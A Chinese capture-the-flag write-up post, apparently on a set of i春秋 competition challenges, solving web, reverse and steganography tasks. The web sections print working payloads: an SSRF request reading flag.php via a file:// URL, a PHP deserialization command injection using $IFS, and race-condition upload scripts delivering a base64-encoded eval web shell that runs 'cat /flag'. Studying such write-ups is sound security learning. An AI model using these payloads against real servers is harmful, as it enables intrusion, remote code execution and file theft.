写在前面：最近会看大佬的WP重新复现一遍题~所以~持续更新~

超级简陋的目录：

WEB-1 【无需复现】
WEB-2 【无需复现】
WEB-3 【无需复现】
WEB-4 【未复现】
aessss 【未复现】
rsaaaa 【未复现】
92 【2018-11-5 20:27复现更新完毕】
easy_py 【无需复现】
N0find 【未复现】
baby_arm 【未复现（还在安环境。。。）】
memo__server 【未复现】
cpp 【等待复现写详细WP】
cyvm 【未复现】
What's_it 【未复现】

WEB-1

题目：what are you doing?

访问web1链接出现what are you doing? 常规思路看一下网站源码，发现有robots.txt

what are you doing?<br /> <!--  you need to visit to robots.txt  -->

我们访问robots.txt发现有两个php文件

source.php
flag.php

访问flag.php是一个空白页面，访问source.php回显you need to login as admin!我们查看source.php的源码

you need to login as admin!<!-- post param  'admin' -->

嗯，我们需要用admin身份登陆，post过去admin=1

you need to login as admin!<!-- post param  'admin' -->only 127.0.0.1 can get the flag!!

我们需要用127.0.0.1去访问，我们在请求头里添加x-client-ip:127.0.0.1，然后再去发包

you need to login as admin!<!-- post param  'admin' -->you need post url: http://www.ichunqiu.com

根据提示我们post过去下面的数据，发现会返回一个图片地址，但这个图片无法显示，我们把图片下载下来，会发现他是html，而且i春秋的主页

mark

到这里其实卡了半天，在‘’url=https://www.ichunqiu.com+路径会得到该路径的网页源码，尝试拼接url然后下载flag.php的源码，但是拼接半天未果。还是队友后来想到了直接跳转目录，访问本地文件flag.php，然后把返回的该图片载下来，就是flag.php的源码,payload如下

POST /source.php HTTP/1.1
Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-client-ip:127.0.0.1
Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: keep-alive
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
Upgrade-Insecure-Requests: 1

admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php

mark

最后拿到把图片改成php文件，拿到flag

<?php
$flag="flag{2ca93a96-39e3-48c9-9377-fd79a9f1c40b}";

web-2

题目：Can you hack me?

这个题是个.swp的文件泄露,我们把.swp文件下载下来进行源码审计

mark

.swp文件需要在linux下用vi -r index.php.swp来恢复文件

然后开始代码审计········

<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }


}
else
{
    echo "Can you hack me?<br>";
    }
?>

通过分析代码我们可以知道要先get参数绕过然后执行反序列化，get参数绕过如下

?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag

然后开始思考绕过反序列化，根据题目代码得知，__wakeup方法执行了一个过滤字符的waf。所以需要利用谷歌发现的CVE-2016-7124漏洞，当序列化的字符串中，如果表示对象属性的个数的值大于真实的属性个数就会跳过wakeup的执行。 可是发现本地测试可以通过，远程却不可以。。。。难受了，开始代码审计，发现没有过滤斜杠，而空格可以使用$IFS绕过，同时通过学习参考链接：

https://www.knowsec.net/archives/341/

https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1

于是payload：

POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"`cat$IFS/flflagag`";i:1;s:3:"hjj";}}

web-3

打开题目，直接给了源码。

竞争上传shell

poc1

import threading

import requests

def send(num):

    url="http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"

    # url="http://web3.shb.5am3"

    file_name = "file"

    file_upload_name = "5am3.php"

    f= open("5am3.php","r")

    data={

        "file[1]":"aaa",

        "file[]":"php",

        "hehe":"http://test2.5am3.com/test.php"

    }

    file={

        file_name: (file_upload_name, f),

    }

    # print("2")

    try:

        req=requests.post(url, data, files=file)

        # print(req.text)

        if("@" in req.text):

            print("crack ok!")

    except Exception as e:

        print "1"

def crack(threadNumber=5):

    threads=[]

    for num in range(120,121):

        threads.append(threading.Thread(target=send,args=(num,)))

    for thread in threads:

        thread.start()

        while True:

            if (len(threading.enumerate()) < threadNumber):

                break

while(1):

    crack()

# send(111)

poc2

import threading

import requests

def send(num):

    url="http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"

    # url="http://web3.shb.5am3"

    file_name = "file"

    file_upload_name = "5am3.php"

    f= open("5am32.php","r")

    data={

        "file[1]":"aaa",

        "file[]":"php",

        "hehe":str(num)+".php"

    }

    file={

        file_name: (file_upload_name, f),

    }

    # print("2")

    try:

        req=requests.post(url, data, files=file)

        # print(req.text)

        if("@" in req.text):

            print("crack ok!")

    except Exception as e:

        print "1"

def crack(threadNumber=20):

    threads=[]

    for num in range(100,900):

        threads.append(threading.Thread(target=send,args=(num,)))

    for thread in threads:

        thread.start()

        while True:

            if (len(threading.enumerate()) < threadNumber):

                break

while(1):

    crack()

# send(111)

payload :

POST / HTTP/1.1
Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://web3.shb.5am3/
Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
Content-Length: 1107
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file"; filename="5am3.php"
Content-Type: text/php

@<?php 
$file = 'config.php';
$code = base64_decode('QDw/cGhwCiAgICBpZihtZDUoJF9QT1NUWydwYXNzJ10pPT0iNGViZDM5N2QzZWU2NmMyMTBlM2RjNWYzYWNmOGQ5YzMiKSBldmFsKCRfUE9TVFsna24wY2snXSk7Cj8+CiAgICAgICAgICAgIAogICAg');
file_put_contents($file, $code);
?>
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[1]"

sssss.asd
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[]"

php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="hehe"

/var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="pass"

5am3
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="kn0ck"

system("cat /flag");
-----------------------------21022237801674110016436295918--

MISC-easy py

可以通过010 editor来分析pyc文件结构，然后让其生成CSV文件，简单排版后根据010自动检测出的变量列表填入Value，并推测其实际的python代码。并且推测程序加密逻辑，进而写出解密程序。

mark mark

int cmp[15]={};
int q=0;
for(int i=0;i<15;i++)
{
    for(int j=0;j<255;j++)
    {
        if(cmp[q] == ((~j)&102)|(j&(-103)))
        {
            q=q+1;
            cout<<(char)j;
            break;      
        }
    }
}

可以写出解密脚本

cpp

根据逆向发现flag经过两层加密，因为运算量较小，可直接通过爆破法直接求解

[图片上传失败...(image-40ab3e-1541408536205)]

最终 flag{W0w_y0u_m4st3r_C_p1us_p1us}

92

打开文件发现这么一大堆字符

mark

拖到底发现

mark

发现D0CF11E0（DOC文件头），那么推测需要行置换，利用EXCEL。

（首先修改单元格格式为数值型，紧接着在A列插入序号（强烈建议使用自动填充），然后排序，再复制回来）

mark

复制进HxD，存为doc文件，打开发现需要密码！

mark mark

接着又发现第一行最后几位是倒序的PNG文件头（74E40598）

mark

写脚本倒序

file_read = open("/home/xiaolan/Desktop/get.txt", 'r+')
file_wtite = open("/home/xiaolan/Desktop/out.txt", 'a+')
for i in range(229893):
    str_1=file_read.readline(32)
    file_wtite.writelines(str_1[::-1])
file_read.close()
file_wtite.close()

得到PNG文件

mark mark

扫描后得到>:2?kEaX

mark

解码得到doc的密码Passwd

mark

打开文档发现

mark

再次扫喵

[图片上传失败...(image-163b9f-1541420455499)]

得到flag{XXXX+XXXX+stlganography}

挪开二维码发现

mark mark

得到flag{M1sc_+XXXX+stlganography}

然后解密图片

mark

得到了flag为

flag{M1sc_Off1c1_stlganography}